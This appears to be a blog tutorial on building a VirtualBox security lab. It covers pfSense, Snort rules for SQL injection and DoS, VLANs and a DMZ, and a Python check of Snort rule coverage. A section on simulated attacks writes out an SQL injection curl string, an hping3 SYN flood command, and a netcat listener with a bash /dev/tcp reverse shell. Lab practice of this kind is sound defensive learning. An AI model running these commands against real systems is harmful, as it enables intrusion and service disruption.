2025-02-05
In this project, we implemented a comprehensive network architecture using VirtualBox, focusing on cybersecurity measures. Below are the key components and commands used:
1. Setting Up pfSense Firewall
- Installation: Download the pfSense ISO and set it up as a virtual machine in VirtualBox.
- Configuration:
```bash
# Assign interfaces (WAN, LAN)
ifconfig em0 up
ifconfig em1 up
# Configure WAN and LAN IPs
pfctl -e # Enable pf firewall
```
- Rules: Set up rules to allow/block traffic between zones.
2. Deploying Snort IDS
- Installation:
```bash
sudo apt-get update
sudo apt-get install snort
```
- Configuration:
```
# Edit Snort configuration file
sudo nano /etc/snort/snort.conf
# Add custom rules for SQLi and DoS detection
alert tcp any any -> any 80 (msg:"SQL Injection Attempt"; content:"' OR '1'='1"; sid:1000001;)
alert tcp any any -> any 80 (msg:"DoS Attack Detected"; threshold:type threshold, track by_src, count 100, seconds 60; sid:1000002;)
```
- Start Snort:
```bash
sudo snort -A console -q -c /etc/snort/snort.conf -i eth0
```
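The SQLi rule above matches the literal bytes `' OR '1'='1` in the TCP payload, so whether it fires depends on how the client encodes the query string. The following added example (not part of the original post) checks the rule's content string against constructed request lines, first as raw bytes and then against a percent-decoded, case-insensitive URI; `unquote` is an assumed stand-in for an IDS's URI normalization, and the sample names are hypothetical.

```python
"""Raw-bytes `content` match versus a match on the decoded URI.

Added illustration: urllib's unquote approximates an IDS's HTTP URI
normalization; it is not Snort's implementation.
"""
from urllib.parse import unquote

NEEDLE = "' OR '1'='1"  # content string from the rule on this page

# Constructed request lines (sample data, not captured traffic).
SAMPLES = {
    "literal": "GET /index.php?id=1' OR '1'='1 HTTP/1.1",
    "percent_encoded": "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1",
    "lower_case": "GET /index.php?id=1%27%20or%20%271%27=%271 HTTP/1.1",
    "benign": "GET /index.php?id=42 HTTP/1.1",
}


def raw_match(request_line: str) -> bool:
    """Case-sensitive substring match on the bytes as sent (rule as written)."""
    return NEEDLE in request_line


def normalized_match(request_line: str) -> bool:
    """Case-insensitive match on the percent-decoded URI."""
    parts = request_line.split(" ")
    uri = " ".join(parts[1:-1])  # tolerate raw spaces inside the URI
    return NEEDLE.lower() in unquote(uri).lower()


def coverage() -> dict:
    """Return {sample_name: (raw_hit, normalized_hit)} for every sample."""
    return {name: (raw_match(line), normalized_match(line))
            for name, line in SAMPLES.items()}


if __name__ == "__main__":
    for name, (raw, norm) in coverage().items():
        print(f"{name:16} raw={raw!s:5} normalized={norm}")
```

In Snort 2 rule terms, the second column corresponds to adding the `nocase` and `http_uri` modifiers to the `content` option.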
3. Configuring VLANs and DMZ
- VLAN Setup:
```bash
# Create VLANs on a switch (simulated in VirtualBox)
vconfig add eth0 10
vconfig add eth0 20
# Assign IPs to VLANs
ifconfig eth0.10 192.168.10.1 netmask 255.255.255.0 up
ifconfig eth0.20 192.168.20.1 netmask 255.255.255.0 up
```
- DMZ Configuration:
  - Place the web server in the DMZ and connect it to the MySQL database in the LAN.
4. Simulating Cyberattacks
- SQL Injection:
```bash
# Simulate SQLi using curl
curl "http://192.168.10.100/index.php?id=1' OR '1'='1"
```
- Denial of Service (DoS):
```bash
# Use hping3 for DoS simulation
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood 192.168.10.100
```
- Reverse Shell:
```bash
# On attacker machine
nc -lvp 4444
# On target machine
bash -i >& /dev/tcp/192.168.10.1/4444 0>&1
```
What Undercode Say
This project highlights the importance of securing network architectures through segmentation, firewalls, and intrusion detection systems. By simulating real-world attacks, we gained hands-on experience in identifying and mitigating threats. Below are additional Linux commands and tools to enhance your cybersecurity skills:
- Nmap for Network Scanning:
```bash
nmap -sP 192.168.10.0/24
```
- Wireshark for Packet Analysis:
```bash
sudo wireshark
```
- Fail2Ban for Brute Force Protection:
```bash
sudo apt-get install fail2ban
sudo systemctl start fail2ban
```
- SSH Hardening:
```
sudo nano /etc/ssh/sshd_config
# Disable root login and change port
PermitRootLogin no
Port 2222
```
- Log Monitoring with Logwatch:
```bash
sudo apt-get install logwatch
sudo logwatch --detail high --mailto [email protected]
```
For further reading, check out these resources:
By mastering these tools and techniques, you can build robust defenses against evolving cyber threats.
References:
Hackers Feeds, Undercode AI



